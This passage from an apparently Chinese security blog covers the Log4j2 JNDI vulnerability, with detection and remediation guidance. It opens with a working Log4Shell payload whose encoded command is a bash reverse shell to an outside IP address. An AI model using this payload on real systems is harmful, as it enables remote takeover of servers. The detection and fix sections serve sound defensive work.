 号双重url编码:YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xNjIuMTQuMTE1LjI0Ni84ODg4IDA%2bJjE=
最终payload:${jndi:ldap://xx.xx.xx.xx:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xNjIuMTQuMTE1LjI0Ni84ODg4IDA%2bJjE=}

payload执行成功后,vps上就会接收到反弹的主机shell

0x06 入侵排查

1. 日志排查

攻击者在利用前通常采用dnslog方式进行扫描探测,对于常见利用方式可通过应用系统报错日志中对以下关键字进行排查。

代码语言:javascript复制
"javax.naming.CommunicationException"
"javax.naming.NamingException: problem generating object using object factory"
"Error looking up JNDI resource"
2. 流量排查
  1. 排查日志或者解码后完整的请求数据包中是否存在${jndi:关键字。
  2. 排查日志是否存在相关堆栈报错,堆栈里是否有JndiLookup、ldapURLContext、getObjectFactoryFromReference等与 jndi 调用相关的堆栈信息。

0x07 漏洞修复

  • 排查应用是否引入了Apache Log4j2 Jar包,若存在依赖引入,则可能存在漏洞影响。尽快升级Apache Log4j2所有相关应用到最新的版本:https://github.com/apache/logging-log4j2
  • 缓解措施:
    • 添加 jvm 启动参数 -Dlog4j2.formatMsgNoLookups=true
    • 在应⽤程序的 classpath 下添加 log4j2.component.properties 配置⽂件⽂件, ⽂件内容:log4j2.formatMsgNoLookups=True
    • 移除 log4j-core 包中 JndiLookup 类⽂件并重启服务
  • 各大厂商针对log4j2漏洞应急方案集合:https://mp.weixin.qq.com/s/ZbzLc_N26lgUfvS-mM4R2g

参考文章

  • https://mp.weixin.qq.com/s/m6BZEEv2drJLv0rm_we3mA
  • https://www.bilibili.com/video/BV1FL411E7g3
  • https://mp.weixin.qq.com/s/tXPgwAk16riRin-rN3de4g
安全 apache https 网络安全 javascript

0 人点赞